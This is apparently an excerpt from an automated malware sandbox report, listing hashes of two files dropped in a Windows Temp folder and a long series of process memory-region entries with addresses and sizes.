                                                                                                                                                                                                                    • \Users\Admin\AppData\Local\Temp\CC4F.tmp
                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      50741b3f2d7debf5d2bed63d88404029

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      56210388a627b926162b36967045be06ffb1aad3

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      f2f8732ae464738372ff274b7e481366cecdd2337210d4a3cbcd089c958a730c

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      fac6bfe35b1ee08b3d42d330516a260d9cdb4a90bbb0491411a583029b92a59d20af3552372ea8fb3f59442b3945bf524ef284127f397ae7179467080be8e9b3

                                                                                                                                                                                                                    • \Users\Admin\AppData\Local\Temp\axhub.dll
                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      89c739ae3bbee8c40a52090ad0641d31

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      d0f7dc9a0a3e52af0f9f9736f26e401636c420a1

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      10a122bd647c88aa23f96687e26b251862e83be9dbb89532f4a578689547972d

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      cc5059e478e5f469fde39e4119ee75eed7066f2a2069590cb5046e478b812f87ab1fc21dcfe44c965061fa4f9f83d6a14accf0c0e9b2406ae51504d06a3f6480

                                                                                                                                                                                                                    • memory/8-147-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/204-349-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/208-299-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/296-261-0x00000203CB900000-0x00000203CB971000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                    • memory/344-131-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      572KB

                                                                                                                                                                                                                    • memory/344-134-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      100KB

                                                                                                                                                                                                                    • memory/344-130-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      100KB

                                                                                                                                                                                                                    • memory/344-117-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/344-137-0x0000000000400000-0x000000000051E000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      1.1MB

                                                                                                                                                                                                                    • memory/344-136-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      100KB

                                                                                                                                                                                                                    • memory/344-133-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      1.5MB

                                                                                                                                                                                                                    • memory/344-132-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      100KB

                                                                                                                                                                                                                    • memory/344-135-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      152KB

                                                                                                                                                                                                                    • memory/348-199-0x000001C3F1840000-0x000001C3F18B1000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                    • memory/348-363-0x000001C3F18C0000-0x000001C3F1930000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      448KB

                                                                                                                                                                                                                    • memory/1088-242-0x00000243F8CA0000-0x00000243F8D11000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                    • memory/1192-347-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/1220-151-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/1224-150-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/1244-246-0x00000226D4360000-0x00000226D43D1000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                    • memory/1256-173-0x0000000000AB0000-0x0000000000AB1000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                    • memory/1256-180-0x0000000000AA0000-0x0000000000AA2000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                    • memory/1256-170-0x0000000000A70000-0x0000000000A71000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                    • memory/1256-166-0x0000000000340000-0x0000000000341000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                    • memory/1256-171-0x0000000000A80000-0x0000000000A9F000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      124KB

                                                                                                                                                                                                                    • memory/1256-161-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/1284-254-0x000001A6FDC10000-0x000001A6FDC81000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                    • memory/1352-364-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/1356-146-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/1440-221-0x000001B5E6F80000-0x000001B5E6FF1000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                    • memory/1596-256-0x0000000004CE0000-0x0000000004CE1000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                    • memory/1596-233-0x0000000000500000-0x0000000000501000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                    • memory/1596-278-0x00000000025D0000-0x0000000002601000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      196KB

                                                                                                                                                                                                                    • memory/1596-250-0x0000000004C90000-0x0000000004C91000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                    • memory/1596-226-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/1700-300-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/1728-367-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/1880-229-0x00000236B1620000-0x00000236B1691000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                    • memory/2100-341-0x0000000004DC0000-0x0000000004DC1000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                    • memory/2100-301-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/2116-297-0x00000000010A0000-0x00000000010B6000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      88KB

                                                                                                                                                                                                                    • memory/2128-358-0x00000178D9C40000-0x00000178D9C8B000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      300KB

                                                                                                                                                                                                                    • memory/2128-185-0x00000178D9CB0000-0x00000178D9D21000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                    • memory/2132-178-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/2168-353-0x0000000000417E8A-mapping.dmp
                                                                                                                                                                                                                    • memory/2204-218-0x0000000005040000-0x0000000005041000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                    • memory/2204-220-0x00000000050C0000-0x00000000050C1000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                    • memory/2204-262-0x0000000005350000-0x0000000005351000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                    • memory/2204-228-0x0000000005100000-0x0000000005101000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                    • memory/2204-205-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      120KB

                                                                                                                                                                                                                    • memory/2204-207-0x0000000000417F26-mapping.dmp
                                                                                                                                                                                                                    • memory/2204-267-0x0000000005070000-0x0000000005071000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                    • memory/2204-215-0x0000000005690000-0x0000000005691000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                    • memory/2240-352-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/2284-348-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/2344-163-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/2344-167-0x0000000000670000-0x0000000000671000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                    • memory/2356-227-0x000001E8F7DB0000-0x000001E8F7E21000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                    • memory/2376-219-0x0000014ABCF20000-0x0000014ABCF91000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                    • memory/2412-155-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/2576-194-0x000002349F860000-0x000002349F8D1000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                    • memory/2576-188-0x000002349F7A0000-0x000002349F7EC000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      304KB

                                                                                                                                                                                                                    • memory/2576-361-0x000002349FE40000-0x000002349FEB0000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      448KB

                                                                                                                                                                                                                    • memory/2644-350-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      64KB

                                                                                                                                                                                                                    • memory/2644-351-0x0000000000A40000-0x0000000000A52000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      72KB

                                                                                                                                                                                                                    • memory/2644-346-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/2664-114-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/2676-265-0x000001EE0C510000-0x000001EE0C581000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                    • memory/2692-275-0x000002059D800000-0x000002059D871000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                    • memory/2752-196-0x000001A596D40000-0x000001A596DB1000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                    • memory/2752-294-0x000001A599700000-0x000001A599806000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      1.0MB

                                                                                                                                                                                                                    • memory/2752-293-0x000001A598D40000-0x000001A598D5B000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      108KB

                                                                                                                                                                                                                    • memory/2752-186-0x00007FF794914060-mapping.dmp
                                                                                                                                                                                                                    • memory/2796-329-0x0000000005320000-0x0000000005321000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                    • memory/2796-177-0x00000000045F1000-0x00000000046F2000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      1.0MB

                                                                                                                                                                                                                    • memory/2796-311-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/2796-326-0x0000000077CD0000-0x0000000077E5E000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      1.6MB

                                                                                                                                                                                                                    • memory/2796-184-0x0000000002DA0000-0x0000000002DFD000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      372KB

                                                                                                                                                                                                                    • memory/2796-172-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/2864-368-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/2992-369-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/3076-159-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/3328-355-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/3356-148-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/3364-145-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/3456-149-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/3732-310-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/3748-327-0x00000000057B0000-0x00000000057B1000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                    • memory/3748-312-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/3868-158-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/3948-153-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/3948-288-0x0000000000900000-0x00000000009AE000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      696KB

                                                                                                                                                                                                                    • memory/3948-290-0x0000000000400000-0x00000000008F4000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      5.0MB

                                                                                                                                                                                                                    • memory/3988-291-0x0000000000400000-0x0000000000949000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      5.3MB

                                                                                                                                                                                                                    • memory/3988-152-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/3988-289-0x00000000025B0000-0x000000000264D000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      628KB

                                                                                                                                                                                                                    • memory/4068-257-0x0000000002860000-0x0000000002861000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                    • memory/4068-266-0x000000000A990000-0x000000000A991000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                    • memory/4068-245-0x00000000007F0000-0x00000000007F1000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                    • memory/4068-268-0x000000000A570000-0x000000000A571000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                    • memory/4068-274-0x000000000A540000-0x000000000A541000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                    • memory/4068-230-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/4068-263-0x00000000029C0000-0x00000000029CE000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      56KB

                                                                                                                                                                                                                    • memory/4132-272-0x0000000004CD0000-0x0000000004D08000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      224KB

                                                                                                                                                                                                                    • memory/4132-280-0x0000000004EC0000-0x0000000004EC1000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                    • memory/4132-236-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/4132-276-0x0000000000EB0000-0x0000000000EB1000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                    • memory/4132-253-0x00000000004F0000-0x00000000004F1000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                    • memory/4132-264-0x0000000000E90000-0x0000000000E91000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                    • memory/4192-316-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/4316-344-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/4316-345-0x0000000000590000-0x000000000063E000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      696KB

                                                                                                                                                                                                                    • memory/4372-313-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/4376-302-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/4388-309-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/4440-303-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/4464-328-0x0000000005AF0000-0x0000000005AF1000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                    • memory/4464-308-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/4520-343-0x0000000004FF0000-0x00000000055F6000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      6.0MB

                                                                                                                                                                                                                    • memory/4520-331-0x0000000000417E9E-mapping.dmp
                                                                                                                                                                                                                    • memory/4524-342-0x0000000005310000-0x0000000005916000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      6.0MB

                                                                                                                                                                                                                    • memory/4524-330-0x0000000000417E8E-mapping.dmp
                                                                                                                                                                                                                    • memory/4528-279-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/4528-283-0x0000000005700000-0x0000000005701000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                    • memory/4668-366-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/4672-284-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/4736-332-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/4840-333-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/4856-335-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/4880-334-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/4896-356-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/4924-337-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/4932-365-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/4944-336-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/4996-340-0x0000000000400000-0x0000000000481000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      516KB

                                                                                                                                                                                                                    • memory/4996-338-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/5000-359-0x00000000044A0000-0x00000000044FC000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      368KB

                                                                                                                                                                                                                    • memory/5000-354-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/5000-357-0x0000000004391000-0x0000000004492000-memory.dmp
                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      1.0MB

                                                                                                                                                                                                                    • memory/5080-298-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                    • memory/5088-339-0x0000000000000000-mapping.dmp